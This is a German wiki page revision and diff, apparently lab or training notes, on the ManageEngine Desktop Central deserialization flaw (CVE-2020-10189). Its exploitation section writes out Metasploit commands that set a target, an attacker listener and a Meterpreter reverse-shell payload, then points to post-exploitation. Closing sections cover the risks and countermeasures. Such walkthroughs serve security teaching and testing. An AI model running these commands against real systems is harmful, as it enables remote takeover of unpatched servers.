Manager Central Schwachstelle: Unterschied zwischen den Versionen
(Die Seite wurde neu angelegt: „== Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) == '''Schwachstelle''': Die Schwachstelle in ManageEngine Desktop Central (z. B. C…“) |
|||
| Zeile 1: | Zeile 1: | ||
| − | == Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) == | + | == Details zur Schwachstelle: ManageEngine Desktop Central Java Deserialization (CVE-2020-10189) == |
| − | '''Schwachstelle''': | + | '''Schwachstelle''': Unsichere Java-Deserialisierung in ManageEngine Desktop Central ermöglicht einem Angreifer Remote Code Execution (RCE). Diese Schwachstelle erlaubt es, speziell gestaltete Java-Objekte zu senden, die deserialisiert und ausgeführt werden, was zur Ausführung beliebigen Codes führt. |
| − | '''Angriffspunkt''': Die Schwachstelle befindet sich | + | '''Angriffspunkt''': Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, die unsichere Java-Deserialisierung auslösen. |
| − | '''Ausnutzung''': Ein Angreifer kann ein speziell entwickeltes Exploit- | + | '''Ausnutzung''': Ein Angreifer kann ein speziell entwickeltes Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten. |
=== Schritte zur Ausnutzung === | === Schritte zur Ausnutzung === | ||
| − | # | + | # Starte die Metasploit-Konsole: |
| − | + | msfconsole | |
| − | |||
| − | |||
| − | + | # Wähle das Exploit-Modul für die Java-Deserialisierung: | |
| + | use exploit/windows/http/desktopcentral_deserialization | ||
| + | |||
| + | # Setze die Optionen für das Zielsystem und die Payload: | ||
| + | set RHOSTS 10.0.10.107 # Ziel-IP-Adresse | ||
| + | set RPORT 8022 # Ziel-Port | ||
| + | set LHOST 10.0.10.101 # Angreifer-IP-Adresse für die Reverse-Shell | ||
| + | set LPORT 4444 # Lokaler Port für die Verbindung | ||
| + | set PAYLOAD windows/meterpreter/reverse_tcp # Payload-Typ | ||
| + | |||
| + | # Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind: | ||
| + | show options | ||
| + | |||
| + | # Führe den Exploit aus: | ||
| + | exploit | ||
| − | + | # Überprüfe die Verbindung: | |
| − | + | Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw. | |
| − | |||
| − | |||
| − | === | + | === Warum ist diese Schwachstelle gefährlich? === |
| − | + | * '''Remote Code Execution (RCE)''': Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen. | |
| + | * '''Weitreichende Auswirkungen''': Volle Kompromittierung des Servers und möglicherweise weitere Netzwerkinfektion. | ||
| + | * '''Angriff auf ungeschützte Versionen''': Ungepatchte Versionen von ManageEngine Desktop Central sind gefährdet. | ||
| − | + | === Gegenmaßnahmen === | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | * Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt. | |
| + | * Verwende Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS), um bösartige Anfragen zu blockieren. | ||
| + | * Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig. | ||
Version vom 28. August 2024, 16:09 Uhr
Details zur Schwachstelle: ManageEngine Desktop Central Java Deserialization (CVE-2020-10189)
Schwachstelle: Unsichere Java-Deserialisierung in ManageEngine Desktop Central ermöglicht einem Angreifer Remote Code Execution (RCE). Diese Schwachstelle erlaubt es, speziell gestaltete Java-Objekte zu senden, die deserialisiert und ausgeführt werden, was zur Ausführung beliebigen Codes führt.
Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, die unsichere Java-Deserialisierung auslösen.
Ausnutzung: Ein Angreifer kann ein speziell entwickeltes Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.
Schritte zur Ausnutzung
- Starte die Metasploit-Konsole:
msfconsole
- Wähle das Exploit-Modul für die Java-Deserialisierung:
use exploit/windows/http/desktopcentral_deserialization
- Setze die Optionen für das Zielsystem und die Payload:
set RHOSTS 10.0.10.107 # Ziel-IP-Adresse set RPORT 8022 # Ziel-Port set LHOST 10.0.10.101 # Angreifer-IP-Adresse für die Reverse-Shell set LPORT 4444 # Lokaler Port für die Verbindung set PAYLOAD windows/meterpreter/reverse_tcp # Payload-Typ
- Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
show options
- Führe den Exploit aus:
exploit
- Überprüfe die Verbindung:
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
Warum ist diese Schwachstelle gefährlich?
- Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
- Weitreichende Auswirkungen: Volle Kompromittierung des Servers und möglicherweise weitere Netzwerkinfektion.
- Angriff auf ungeschützte Versionen: Ungepatchte Versionen von ManageEngine Desktop Central sind gefährdet.
Gegenmaßnahmen
- Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
- Verwende Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS), um bösartige Anfragen zu blockieren.
- Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.